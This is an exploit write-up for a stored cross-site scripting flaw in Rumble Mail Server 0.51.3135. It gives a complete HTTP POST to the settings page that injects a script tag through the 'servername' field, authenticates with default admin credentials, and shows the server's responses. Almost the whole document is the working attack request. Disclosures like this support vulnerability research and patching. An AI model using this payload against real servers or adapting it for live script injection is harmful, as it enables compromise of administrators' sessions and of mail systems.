# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /settings:save HTTP/1.1 Host: 127.0.0.1:2580 Connection: keep-alive Content-Length: 343 Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:2580 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1:2580/settings Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings HTTP/1.1 302 Moved Location: /settings:save HTTP/1.1 200 OK Connection: close Content-Type: text/html RumbleLua

RumbleLua on
Rumble Mail Server v/0.51.3135

Domains & accounts

Server settings

Saving config/rumble.conf